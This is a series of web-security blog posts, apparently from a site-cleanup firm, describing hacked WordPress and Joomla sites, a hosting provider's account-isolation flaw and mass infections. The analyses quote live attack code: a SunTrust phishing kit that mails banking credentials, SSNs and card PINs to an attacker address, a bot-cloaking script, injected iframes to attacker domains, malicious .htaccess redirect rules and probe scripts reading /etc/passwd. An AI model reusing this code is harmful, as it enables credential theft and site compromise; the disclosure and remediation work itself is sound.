Walmart community web site still hacked

Remember a few weeks ago when we reported that the official web site for the Walmart Community Action Network was hacked and hosting SEO spam?

Well, it seems that they removed the previous spam and also upgraded WordPress to latest version. Good for them!

However, I was checking the site out of curiosity today and it has another type of spam now:


samsung delve free ringtones
ringtones for prepaid cell phone
free bollywood ringtones
buy ringtone

This is the report from our scanner:

Instead of the “movie” spam, now they have a ringtone spam pointing to a site that is probably hacked too. An interesting thing is that if you search for these keywords you will find them on a few different sites and even on fake linkedin profiles: http://www.linkedin.com/in/downloadringtones

As far as the location where it is hidden, during the last time it inside their footer.php file. I checked it again and the new spam is also there ( http://www.walmartcommunity.com/wp-content/themes/walcan/footer.php ).

So it looks like the attackers left a backdoor (or stole their passwords again) and they using that to get in (even after having the previous spam removed and wordpress upgraded).

Security tip: If you just remove the visible malware/spam and do not do a full scan/recovery of your site and fix the underlying problem, you will get infected again.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

SunTrust phishing – case study

Last week we were called to fix a Joomla site that got blacklisted and had some malware on it. Nothing unusual as we do that many times a day. However, after some analysis of the site, we found a directory that didn’t look quite right.

That’s what we found: /public_html/components/com_jsecure/SunTrust. Hum… a “SunTrust directory? That shouldn’t be there.

When we looked at the content, it had 4 files:

$ ls -la 
index2.htm
index.htm
login.php
server.php

The index.htm was similar to the login page from SunTrust and asked for the user/pass of the person accessing it:


When the user submitted the form, it would load the login.php script:

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "USER ID : ".$_POST['uid']."\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Powered By SLim------------------------------\n";

$recipient = "peculiarhome@sify.com";
$subject = "SunTrust-Bank";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: index2.htm");

}
else
{
echo "ERROR! Please go back and try again.";
}

This script would send to peculiarhome@sify.com the user name and password of the victim. But that’s not it, after that, it will load the index2.htm that will ask the user for every information possible:

Once the form is completed, the server.php script would be loaded and send all that information to peculiarhome@sify.com:

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "Name On Account: ".$_POST['ucxATMCredentials:txtNAME']."\n";
$message .= "Social Security Number/TAX ID: ".$_POST['ucxATMCredentials:txtSSN']."\n";
$message .= "Account Number: ".$_POST['ucxATMCredentials:txtLast4DigitsOfAcct']."\n";
$message .= "Card Number: ".$_POST['ucxATMCredentials:txtATMPAN']."\n";
$message .= "Pin Number: ".$_POST['ucxATMCredentials:txtATMPin']."\n";
$message .= "Cvv2: ".$_POST['ucxATMCredentials:txtATMCvv2']."\n";
$message .= "Expiry Date: ".$_POST['ucxATMCredentials:txtExp']."\n";
$message .= "Mother's Maiden Name: ".$_POST['ucxATMCredentials:txtMMN']."\n";
$message .= "Date of Birth: ".$_POST['ucxATMCredentials:txtDOB']."\n";
$message .= "Email Address: ".$_POST['ucxATMCredentials:txtEmail']."\n";
$message .= "Email Password: ".$_POST['ucxATMCredentials:txtPass']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Powered By SLim------------------------------\n";

$recipient = "peculiarhome@sify.com";
$subject = "SunTrust-Bank info";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://www.suntrust.com/");

}
else
{
echo "ERROR! Please go back and try again.";
}

Very nasty. We looked at all the logs and since this directory was recent, we believe no one got harmed through it.

Solving phishing
For the banks out there, I recommend that you check your logs and look for all the referees of the images being loaded. In this example we analyzed, the images and the css files were being loaded directory from the suntrust site, so if they were analyzing their logs they would have detected it.

For the web masters and site owners out there: Keep your sites updated, use good passwords and monitor your sites!

As always, if you need help to recover from web attacks or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

A new place to hide web-based malware: php.ini + cgi-bin

We got a call this weekend from a desperate site owner that had just found out that his site was hacked and hosting malware. He was fairly technical and checked everywhere for it. He even reverted back to an old backup he knew was clean, but the problem persisted.

When he explained the problem to me, I was 99% sure that it was something inserted in the .htaccess file. Well, I was wrong. I checked the site as well and didn’t find anything hidden in the normal places.

I then remember a report from another user and from stopmalvertising.com about some malware being hidden inside the cgi-bin directory.

*Most people forget to check the cgi-bin directory because it is outside the htdocs and not targeted that often.

When we checked that directory we found a php.ini containing:

auto_append_file = “/home/user/USER/cgi-bin/security.cgi

What it does is that it appends the output of this security.cgi file to any PHP script. When we checked this file, this is how it looked like:

function detectBot(){
global $is_human,$stop_agent_detected,$stop_ip_detected,$detected_str;
$stop_ips_masks = array(
"66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255 "74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255
"65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255
"74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255
"67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255
"72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255
"38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255
"93\.172\.94\.227", // MacFinder
"212\.100\.250\.218", // Wells Search II
"71\.165\.223\.134", // Indy Library
"70\.91\.180\.25",
"65\.93\.62\.242",
"74\.193\.246\.129",
"213\.144\.15\.38",
"195\.92\.229\.2",
"70\.50\.189\.191",
"218\.28\.88\.99",
"165\.160\.2\.20",
"89\.122\.224\.230",
"66\.230\.175\.124",
"218\.18\.174\.27",
"65\.33\.87\.94",
"67\.210\.111\.241",
"81\.135\.175\.70",
"64\.69\.34\.134",
"89\.149\.253\.169"
);
$stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawler", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress");

$_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent\:[\s ]?|i", "", @$_SERVER["HTTP_USER_AGENT"]);

$is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";
foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("^{$stop_ip_mask}$", defineIP())) {
$is_human = false; $stop_ip_detected = true; $detected_str = "by ip"; break;
}
if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$_SERVER["HTTP_USER_AGENT"]) !== false){
$is_human = false; $stop_agent_detected = true; $detected_str = "by agent"; break;
}
if($is_human and !eregi("^[a-zA-Z]{5,}", @$_SERVER["HTTP_USER_AGENT"])) {
$is_human = false; $stop_agent_detected = true; $detected_str = "not human agent";
}
}
function defineIP(){
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])) return $_SERVER["HTTP_X_FORWARDED_FOR"];
else return $_SERVER['REMOTE_ADDR'];
}

detectBot();

if(!isset($_COOKIE["cook"]) && $is_human)
{
}

Exactly the same as the counter.cgi reported by stopmalvertising.com

So if you ever have to clean a hacked web site, don’t forget to check the cgi-bin directory and the php.ini file.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Network Solutions update and some numbers

I am getting a lot of questions via email or via the comments on what to do if a site hosted at Network Solutions is currently with malware or blacklisted.

Network Solutions issued an update explaining what to do: http://blog.networksolutions.com/2010/what-to-do-when-your-site-is-showing-a-malware-warning-page/

They partnered up with us and we are scanning any Network Solutions site for free for malware, and other security issues. Follow the instructions on their blog to know what do to.

Also, an interesting stats from Google Safe Brownsing:

Of the 114590 site(s) we tested on this network over the past 90 days, 2669 site(s), .., served content that resulted in malicious software being downloaded and installed without user consent.

So a total of 2,669 sites got blacklisted from Network Solutions on the last few days. That’s 2% of all the sites they are hosting (note that not all the sites affected became blacklisted by Google).

Hostek is putting their customers at risk

If you are hosting your site at Hostek.com, you are probably at a higher risk of being hacked. Why? Because they do not do the proper separation of accounts internally, so anyone can access the pages of everyone else.

How do we know that? We were helping a friend with his site over there and when we checked their permissions, we found a big (BIG) security hole on Hostek. Every PHP script is executed with the permissions of the user “nobody” (used by Apache), and every site allows the user “nobody” to access its files.

It means that any user can access the files from everyone else. Even worse, you can add and even modify the files under some circumstances.

Analysis

When we realized that the PHP scripts were being executed as the user nobody, we did a simple PHP script to verify that:

echo “verify..\n”;
$myloc = `pwd`;
echo “myloc: $myloc\n”;
$myid = `id`;
echo “myid: $myid\n
“;

We got this output:

verify.. myloc: /home/XXX/public_html done
myid: uid=99(nobody) gid=99(nobody) groups=99(nobody)

Uh-oh, the PHP script is being executed as nobody. We also learned that probably every user has its own home directory at /home/[user] and their public web site is stored at /home/[user]/public_html.

We tried an additional check after with this script:

$listofusers = `cat /etc/passwd`;
echo "
users:$listofusers\n

“;

And yes, we got the list of all the users inside their shared server ( I won’t list the real users to protect them, but everyone had the home dir at /home/[user] and the shell /usr/local/cpanel/bin/noshell):


users:root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
..

That’s not too bad. What else could we do? Well, we could list the files from everyone else (I won’t show how to do it):


/home/userB/public_html

total 1524
drwxr-x--- 24 userB nobody 4096 Oct 30 01:49 .
drwx--x--x 15 userB actionin 4096 Apr 26 2009 ..
-rw------- 1 userB actionin 16 Apr 11 03:57 .ftpquota
-rw-r--r-- 1 userB actionin 93 Feb 3 2009 LiveSearchSiteAuth.xml
-rw-r--r-- 1 userB actionin 3240 Feb 10 2009 about.php
drwxr-xr-x 2 userB actionin 4096 Nov 30 2007 activate
drwxr-xr-x 7 userB actionin 4096 Mar 10 2009 admin
-rw-r--r-- 1 userB actionin 6243 Feb 5 2009 change_password.php
..

As you can see, the group nobody has the permission to read and execute the public_html directory, so every user can read the files from everyone else.

If that wasn’t bad enough, we were able to cat the passwords from wp-config.php (used by WordPress), configuration.php (used by Joomla) and even .htpasswd used to protect specific directories.

Can it get worse?

What is really bad is that some CMSs (specially Worpdress), have a directory to allow the user to upload files in there via the web. With WordPress it is inside wp-content/upload.

The permissions of this directory allowed the user nobody to add and modify any file in there. So we were able to add files into other people’s site (see test.txt on the screenshot) and even modify anything they had uploaded. Really bad.


And yes, we contacted them and got no reply.

Network Solutions hacked again

Network Solutions is getting hacked again. Just today we were notified of more than 50 sites hacked with the following malware javascript:

If we decode this javascript, we see that it is injecting this iframe from http://corpadsinc.com/grep/ :

document.write (s) < iframe frameborder="0" onload=' if (!this.src){ this.src="http://corpadsinc.com/grep/"; this.height=0; this.width=0;} '

Note that this time we are seeing all kind of sites hacked. From WordPress, Joomla to just simple HTML sites.

UPDATE 1: Google is already blacklisting lots of them… Bad day to be a Network Solutions customer.

UPDATE 2: Some sites are also compromised with this encoded javascript:

Which injects an iframe from that http://mainnetsoll.com/grep/ domain (same from the attack of last week)

iframe frameborder=”0″ onload=’ if (!this.src){ this.src=”http://mainnetsoll.com/grep/”; this.height=0; this.width=0;} ‘

UPDATE 3: Some WordPress sites we were analyzing only had the malware inserted at the cache file from WP-Super-Cache. Everything else was clean.

UPDATE 4: Post from http://stopmalvertising.com explaining their finds on this issue.

UPDATE 5: Network solutions updated their blog apologizing to their clients and saying that they are working hard to fix it. Hopefully it will be solved soon.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Walmart web site hacked and hosting spam

A few days ago someone contacted us asking for help to clean up their site. They got hacked and the attacker added a bunch of spam links to it.

We fixed it for them and we decided to search for more sites that were also infected. Our surprise: One of Walmart official web sites, www.walmartcommunity.com (for their Community Action Network) was one of the first results.

If you look at their source page you will see all the spam links:

Die, Mommie, Die! download movie..
Lethal Weapon 2 download movie..
Black Rain download movie
The World Is Not Enough download movie
..

Checking their site with our malware scanner we noticed that all their pages have these spam entries:


It means that the attackers probably injected the spam in one of their templates files. After a bit of search, we found all of them inside the footer.php:

We tried to contact them, but only got their automated response (web site help), so hopefully with this post they will fix it. They are running WordPress 2.8.4, which is not that old, so I am assuming they got hacked via stolen FTP/SSH credentials or something like that.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Conditional redirects (or the htaccess malware)

We see all types of malware daily, but one of them seems to cause a lot of confusion to our users (and everyone in general). This is the common question we hear:

“Some users are complaining that when they search for my site on Google, they are redirected to a site full of malware/virus/spam, but when I access, it looks fine. I even scanned it with multiple anti-virus and they didn’t detect anything”

What that means is that someone hacked your site and modified your .htaccess file to redirect users coming from Google to a malware-infested site. Because of that, you end up blacklisted and losing users that can’t reach your site. (well, at least 99% of the time this is the cause).

That’s how the modified .htaccess file looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://badsite.com [R,L]

On some we even see these conditional redirects if the users are coming from Twitter, myspace, Linkedin, etc:

..
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .blog. [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
..

The reason most desktop anti virus (or malware scanners) won’t detect that when you scan your files is because they don’t understand the .htaccess file and they won’t follow this redirection. On Sucuri that’s how we would alert:
How to fix it?

Fixing this redirection is very simple, you just need to delete these entries from your .htaccess file (you can have more than one, so check all your directories) and you are set. However, you still have to verify that you don’t have anything else hidden in there, so do a full scan of your web site to make sure you are clean.

In addition to that, you still need to fix the problem that allowed you to get hacked. Most of the time it means updating your web application (WordPress, Joomla, etc), changing your passwords and cleaning your desktop.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

Details on the Network Solutions / WordPress mass hack

Update 1: The attack continues! Now they are using the domain http://mainnetsoll.com/grep/. Make sure to fix your wp-config and change your database password ASAP.

Update 2: A quick fix if you can’t change your database password. Set the WP_SITEURL inside your wp-config. It will override the change in the database. Just add this line inside your file:
define(‘WP_SITEURL’, ‘yoursite.com’);

Update 3: If you are seeing attacks from a different domain, please let us know. If you need help, send us an email and we will try to help asap (use contact@sucuri.net ).

Yesterday we reported of a mass infection of WordPress blogs that were hosted at Network Solutions.

First of all, I must say that the response from Network Solutions was very good. They were active on the forums, responding to users via Twitter and really trying to find and fix the problem. They even send me an email just after my first post went live to get more information and share notes. That’s what I like to see from a hosting company.

Anyway, we discussed via the phone yesterday and after a long analysis they have nailed the cause of the problem. This is what happened:

  1. WordPress stores the database credentials in plain-text at the wp-config.php file.
  2. This configuration file should only be read by Apache, but some users (well, lots of users) left it in a way that anyone could read it (755 instead of 750 in Linux slang).
  3. A malicious user at Network Solutions creates a script to find those configuration files that were incorrectly configured.
  4. This same malicious user finds hundreds of configuration files with the incorrect permissions and retrieves the database credentials
  5. Yes, he again (the bad guy) launches an attack and modify the database for all these blogs. Now the siteurl for all of them just became networkads.net/grep. Easy hack.

So, at the end anyone can be blamed. At WordPress for requiring that the database credentials be stored in clear-text. At WordPress again for not installing itself securely by default. At the users for not securing their blogs. At Network Solutions for allowing this to happen.

I also have to agree with Network Solutions that this problem can happen at any shared host site. Not only for WordPress, but for any CMS out there that store the passwords in clear-text. For anyone affected with this problem (or anyone at a shared server), change your database credentials ASAP and make sure your configuration file is not readable by everyone else.

*To change the permissions via FTP, just run chmod 750 wp-config.php inside your blog directory.

**As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at dd@sucuri.net

Mass infection of WordPress blogs at Network Solutions

Since yesterday we are seeing a large number of WordPress blogs (running the latest version 2.9.2) getting infected with malware. None of them are using the same plugins or the same themes. Some of them even have wp-admin access blocked to only a few IPs and via htpasswd password. The only similarity between them is that they are all shared hosts at Network Solutions.

Some of our clients spoke with Network Solutions and they confirmed that all their WordPress sites are having issues, but their servers are clean (are they?).

What is interesting about this attack is that it does not create or modify any files, so the average security advice does not apply here. The only thing is does is to modify your “siteurl” inside the “wp-option” table to point to http://networkads.net/grep/, breaking the site layout completely.

That’s how it looks like in the database:

(2, 0, ‘siteurl’, ‘‘, ‘yes’),

The only way for the database to be modified like that is via SQL injection or a bigger problem inside Network Solutions databases.

Anyone else having this issue? If you are, let us know about it.

*To fix this issue, just revert your siteurl back to the previous value. Log in to your control panel, go to manage database, and edit the siteurl value on the wp-option table.

**If you need help cleaning this up, send us an email dd@sucuri.net

Update 1: More Network solution users affected:

Same thing — some HTML inserted into the siteurl field in the wp_options table, and I can’t get to my login page. I hadn’t upgraded to 2.9.2 yet, and the site’s not using SimplePress forum. So it’s not just 2.9.2 that is affected, if that helps at all.

And here:

My site njnnetwork.com got hacked yesterday morning. After a series of non-productive tasks all day, Network Solutions admitted they have been hacked on many WordPress sites.

Here as well:

They changed my wp-options siteurl to be an iframe pointing to networkads.net/grep The site was not loading correctly so I was able to find this in phpmyadmin. I have had a rash of hacks lately and talked to Network Solutions (my host) They tell me all of their wordpress sites are getting banged up, but their servers are clean.

And many more at the WordPress forums.